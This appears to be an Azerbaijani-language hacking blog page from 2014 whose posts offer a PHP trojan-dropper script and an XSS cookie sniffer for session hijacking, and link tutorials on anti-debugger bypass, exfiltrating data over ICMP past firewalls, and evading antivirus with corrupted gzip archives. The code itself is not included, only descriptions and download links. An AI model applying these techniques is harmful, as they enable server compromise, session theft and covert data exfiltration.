Страницы

понедельник, 24 февраля 2014 г.

PHP FileUploadScript(Dropper) & Simple Sniffer


  • Salam.
  • Sizlərə yazdığım 2 .php scriptini təqdim edirəm..
  • Scriptlərdən biri Remote Troyan upload ucun nezerde tutulub.
  • Dropper olaraq.
  • Digəri isə ekər hallarda xss ataklar zamanı redirected istifadə edilib remotedən cookilər sniff olunur və yeni sessiya yaradaraq sistemə giris edilir.
  • Bu scriptimdə mehz bunun üçün nəzərdə tutulub.
  • P.S Buna aid proqram yazmaq fikrim var bu işi avtomatlaşdıran bir proqram.
  • Yaxın zamanda hazır olacaq.
  • Kodlar.
    /* Php Remote dowloader v1.0
    Scripti Daxil oldugunuz her hansi bir servere upload edin.
    Ve daha sonra get metodu ile yuklenecek faylin linkini .
    http://xxx.com/%scriptname%?link=yourfile.exe seklinde elave edirsiniz.
    birde saxlanlacaq faylin adi var onu http://xxx.com/%scriptname%?link=yourfile.exe&name=faylinadi
    veya ../../
    istifade ede bilersiniz.!!!
    (PHP 4, PHP 5)
    */

Yüklə http://www.boxca.com/xju5dr8bip4i/p4tcher_php_attack_script_simple.rar.html

Autoit Anti-Anti-Debugger technique(Bypass)

Salam.
Bu gün sizlərə Autoit AAD haqqında danişacam.
Nədir AAD
AAD Analitiklərdən qorunmaq üçün Autoitlə gələn bir texnikadır.Yenə analitiklər Autitlə yazılmış proqramları analiz etmək istədikdə Au3 Windows Apidəki İsDebuggerPresent(http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345(v=vs.85).aspx)-dən istifadə edərək bunun qarşısını almağa çalışır.

Mənsə dərsliyimdə OllyDebugger İlə Xor-dan istifadə edərək bu texnikani bypass etməyi göstərəcəyəm.
Dərslikdə OllyDebugger + ApiMonitor proqram təminatlarından istifadə etmişəm.
http://www.ollydbg.de/
http://www.rohitab.com/apimonitor


Dərsliyi yüklə.
http://yadi.sk/d/BKJRfhXvJStUv


суббота, 22 февраля 2014 г.

Club timer pursues you.(ClubTimer sizi izleyir)

Salam hörmətli oxucularım.
Özüm demək olar günümün əksər hissəsini İnternet klublarda oluram.
Ona görədə belə bir mövzu açmaq istədim..
ClubTimer proqramını yəgin hamınız eşitmisiniz.
Yaxın dostum klubun sahibi mənə bələ bir sual verdi
Mən CT ilə client tərəfin displayına baxanda onun bundan xəbəri olmur hə?
Məndə dedim hə.
Dedi səndə oturanda baxsam bilmərsən qaqaw :D
Sonradan fikirləşdim ki bu çox təhlükəlidir.
Çun ki bəzən elə şeylər olur ki onları gizlətmək lazım olur.
Amma Server nə etdiyinizi görür.

Ona görə evdə bunun üzərində işlədim və snort(Sisadminlər üçün əvəz edilməz sniffer) ilə kiçik bir analiz nəticəsində bunun yolunu tapdım.

Və avtomatlaşdırdım.
             Dərliyi yüklə.
               http://bit.ly/1jYMtVb
                                                                         Snort rəmi ünvanı.
                                                                    http://www.snort.org/

пятница, 21 февраля 2014 г.

Confidential məlumatların İCMP üzərindən ötürülməsi.(Firewall bypass)

Salam hörmətli oxucular.Bu dərsliyimdə sizlər üçün Confidential məlumatların şəbəkə daxilindən xaricə
necə göndərmək olar onu başa salacağam.
Ilk öncə onu deyim ki,bütün bunları manual olaraq göstərəcəyəm.
Amma proqramlaşdırma haqqında məlumatınız varsa bunu avtomatlaşdırada bilərsiniz.
Əminəm ki,bilən adamlar belə bir sual verəcəklər.
Səbəkədən məlumatı xaricə ötürmək üçün elektron dərsliyə nə ehtiyac var?
Raziyam :D
Amma bəs əgər şəbəkədə Firewall proqram təminatı varsa necə?:)

Ardı dərsliyimdə.
Dərslikdə istifadə olunan icmp_out.pcap faylı.
https://www.dropbox.com/s/jp19273r641ee6u/icmp_out.pcap 
Dərslikdə istifadə olunan Paket sniffer proqramı.
http://www.wireshark.org/
Dərslikdə istifadə olunan Paket builder proqramı.
http://www.colasoft.com/packet_builder/

Dərslik. https://www.dropbox.com/s/o1u6md1pgskgx7h/Confidential%20melumatlarin%20ICMP%20uzerinden%20oturulmesi.Bypass%20firewall.pdf

четверг, 20 февраля 2014 г.

Clamwin and etc Antivirus Bypass with damaged gzip archive

http://www.exploit-db.com/wp-content/themes/exploit/docs/31685.pdf
http://packetstormsecurity.com/files/125249/Clamwin-Antivirus-Bypass-Methodology.html
Dünən axşam fuzzing nəticəsində ClamWin Antivirusu bypass etməyi bacardım.
Məntiq belədir.gzip formatında olan arxivi manual yolla zədələdım.
ve fake size verdim.


7zip ve Winrar arxivi problemsız şəkildə açdı. test zamanıda nəticə müsbət oldu.

Və qərar gəldim ki sizlər üçün bunu dərslik şəklində paylaşım.
Fuzzing zamanı Eicar AV test(http://www.eicar.org/85-0-Download.html) faylından istifə etdim.
DİQQƏT!
Dərsliyin icazesiz paylaşılması ve methoddan pis məqsedlər üçün istifadə etmək qadağandır.
Clam Antivirusuna bu haqda artıq məlumat vermişəm cavablarını gözləyirəm.
O ki,qaldı digər Antivirus proqram təminatlarına böyük ehtimal bir neçəsindədə bu üsülla bypass əməliyyati həyata keçirilə bilər.
Unzip Arxiv parolu:redhatz.org
http://bit.ly/1g8VCF9]http://bit.ly/1g8VCF9
Linkərlə bağlı hər hansı bir problem olsa xahiş edirəm mənə bildirəsiniz VACİBDİ!!!

Buda virustotal nəticələri.
Non damaged gzip arxivi.
https://www.virustotal.com/ru/file/4cf144cde542b474193f2d77361fb29039fda07e61fb545e714583f4dcb89294/analysis/1392557895/
Damaged gzip arxivi.LOL:D Nəinki clam yarısından çoxu detect etmir.:win
https://www.virustotal.com/ru/file/ca11e7673206521a51467a65416dbdc796e85f5bde6e6341e06bbed250c81ae0/analysis/1392558040/


Clamwin resmi forumda aldigim cavab:
http://forums.clamwin.com/viewtopic.php?p=17224#17224

Windows Registry change notification protoip.

Salam.
Yazdığım script Windows istifadəçiləri üçün registry-də (cari açarda) baş verən dəyişiklikləri bildirir.


Əslində təhlükəli proqram təminatlarını analiz edən analitiklər üçün əla alətdir.
Hələlik prototip olaraq yazmışam.Üzərində biraz işləmək və təkminləşdirmək olar.
Python 3.3.2 versiyasında yazılıb.Lakin Py 3.x.x versiyalarında işləkdir.


Online src.http://pastebin.com/h4XpwzGC
Yükləmək üçün: http://bit.ly/1hyfZRl